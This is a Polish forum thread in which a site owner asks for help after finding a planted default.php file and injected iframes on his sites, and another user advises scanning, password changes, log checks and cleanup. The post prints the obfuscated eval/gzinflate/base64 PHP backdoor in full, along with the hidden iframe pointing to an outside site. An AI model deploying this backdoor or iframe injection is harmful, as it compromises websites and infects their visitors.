Dziwny plik default.php i injection kodu, Jak sobie z tym poradzić? Opcje

[Radek_1]

Mam problem, ponieważ na moich stronach tworzony jest plik default.php o następującej treści:

[PHP] pobierz, plaintext 
<?php eval(gzinflate(base64_decode("DZQ3EqtaAgX38qP3i0AgfE1NgBHee0imMBcPwl4Qq5+3gI5OnwYwH/80TzfXY36AP0W+A4r4XwXKbwX+/CNWLr4vd8pxInf+Or9ruLTWh1C0SHp+Xzfj8Aij13VNtGcpByyNLMu9GY4FRXrAUb6r2aRRrvWy2brWF
f2a1JUmSLxi22IzyLuRVPEGIf/VfdRsb50BCIMLpdVuCh21eqqHlxFUk+XLA+XC1JTaGVf4JnHmlYz2vaC3fbybF2WYjdL3eIgWlmmriKh
Ui13cI+qO2OldJmkoxc7I57MvLr7tac4GMsBOS1vxmqOGVY4hfPxA6zYY7eYRj6a4PECFOqrED2d8hDWo
oWNGX7WFQToU/KCUoVUKfEfrj/J4Js4nHYa2H7xaL0coTbljAc4J0Rcqb8n6cZbkTxjlVeHPltTuG30+SchedxmHyN4MaBfaXHQaucxnl9
HZj5JVZvxJByLg41LhcGNCJzw4bfoR3oB2/ZtUvn71VrfjNQnjdmZPt6akzyRME4w+btxg3nxXaBpq4eeqss/vQtbW/OAE5MLEi8tAPlQK5adUMQTq7uPyI7Xv7keB5uO8ZM9gNqegw5Fy90IxKBZ0MWqdBu2ieVg/WB13vB7tJ9tl2CRA70YD1zPVkvJO7md0RwDwUdfp8m2nN0ivT4C9kdNblKxXkYOmP1OIq57V+Nz5pgnM
kGIV3K680z9oVOnSnTIG65p8P9Rv14vmCsYRJ1WGDsXrFBlvziW2EPhs5KvTvl0r+tjvwmZeE98hG6E+n
RngJ2nt5pD28lSw2Uoh1HnyR41f0Fdkx3ypw+MhOAgXeX3wEUrxvhUUrBh939yAOdxnlUoq/UwVPUTBZjRGRdlpliPfmvExyAvTWFGOJkgFBmwLo1tlyNbuOsOp8eyZo3d9R3aSZqSo1VqWAfMdTYzAN
ba7FVcC67Iycz2J1RN4zPveXeoFgik5vm+MTxWhQNHcVmYsAFHsHZWjbLioiWSqvZNpMlJ0tUO1cyVzNs
xJSjJdKYi/mIx4yObKye8FM5vzy/I1OUaU8nvRbfKdfTYg/T0VwI50iMF9jN/57/rhI+IdtyS1ARm10XiFdejv8UzIzuElCLTRh7kuRY0/LoX+fK3Sg1TZGkTOEo1P98P7l6ClHuhIBiqER3HfmMxHpgYJTkkU8Sy2PIrElqu7SgOzd2LPo+kt/21AHy17EcpPNxi9VgbHNPGfW2ZJQ/1JV/JmM+XO4hj4j6yR253svbYkvdpnQykT6Itm6m/skX4A0lHsOXZl/G4EfZJDG97FjEBFYKC4WJfWwlKae+xblPaOHVHDz/tDImIp9wugWYpnRSV/cvsvzRUfnfDMBgTNmWNAuHFHXRmTUDT//AipY2FYS75uWmfdXKjmmuszqW/HJFnD3Q1nT2zBMS0WiJKen/F98E/9ujNn1cd5k1W8VUXxlvQEdBaQKoAGBU2DWIN0HGS8ohCNjU+tC6YJZmnyzNq9FD5xSH99PJIp+73TRF1
zUYZKSY3zGdJxhdWJZMR5g0reYLlSv/ZH4FzEzGsrcmpvud3z1/GC69eBtPYg+5OEmnoJ1ULfvh1Dj48Y7w6FEQLiTsbdRXGVHHJ1XXh9WYmP01+PFVOEWQg2Q2IyI+OEg4
2VdWh0RpHamhHH+DjNV45X/50tuM5pvyXEHFbmtv1mPSkTpFx8Q8loQe8cFe4izBhKqr37KfMRGfQKxOt5fZTaoWkWgc78sK/XVf73n3///fc//wc="))); ?>
[PHP] pobierz, plaintext 

Prawdopodobnie jakiś robot wyszukuje dziury (i to pewnie jakaś standardowa) i potem wstawia ten plik default.php w każdym podkatalogu. Najgorsze jest to, że na drugim, niezależnym zupełnie serwerze i stronie również taki kod i plik się pojawił. Dodatkowo do plików php przed znacznikem </body>, plików js wstawił taki kod:

[HTML] pobierz, plaintext 
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1530848></iframe>
[HTML] pobierz, plaintext 

Jak sobie z tym poradzić? Nie używam żadnych Wordpressów. Jedynie phpBB, czy to może być powodem, stara wersja i dziury? JS sam praktycznie nie piszę, korzystam z gotowych skryptów i bibliotek (JQuery). W przypadku POSTów i GETów korzystam z:
liczby - rzutowanie (int)$_POST[data])
tekstu - htmlspecialchars(addslashes($_POST[data]))
więć to też nie powinno być chyba problemem.

Jak sobie z tym poradzić, co może być tego przyczyną, co należałoby sprawdzić?

Ten post edytował Radek_1 21.02.2013, 15:23:35

[sowiq]

Poszukaj na tym forum - było o tym wiele razy.

Tak na szybko: (prawdopodobnie) masz na kompie wirusa, który wykrada hasła do serwerów FTP, łączy się z nimi i dokleja taki kod do plików. Pierwsze co powinieneś zrobić do porządnie przeskanować komputer, zmienić hasło do FTP i wyczyścić pliki z tego kodu (na pewno będzie więcej plików niż tylko default.php). Pomoże Ci jakieś narzędzie do wyszukiwania w wielu plikach na raz.

Więcej na pewno bez problemu znajdziesz na forum.

[Radek_1]

Na jednym serwerze hasło jest zmieniane często i generalnie jeżeli nie ma potrzeby to nie mam do niego dostępu.

[sowiq]

Jeśli masz taką możliwość, to przeanalizuj logi dostępu do FTP. No i musisz przede wszystkim wyczyścić z tego badziewia wszystkie pliki. Często jeden zainfekowany plik zostawia backdoora do zdalnego infekowania innych. No i poczytaj o skryptach, których używasz. Możliwe, że są w nich jakieś dziury.

Ja osobiście miałem kilka przygód z tymi wirusami. Pierwsza była taka, że badziewie wykradło dane logowania FTP, pozmieniało wiele plików oraz, co ciekawe, zmieniło prawa dostępu do katalogu z cache Smarty, przez co nawet upload zdrowych plików nie pomagał w usunięciu <iframe /> ze strony.

Innym razem jakiś robot wykorzystał dziurę w panelu administracyjnym serwera Plesk i pododawał kod do wszystkich plików JS.

Tak więc możliwości jest sporo. Czyść, skanuj i analizuj logi - pomocna będzie tutaj data modyfikacji plików. To najprostsza metoda.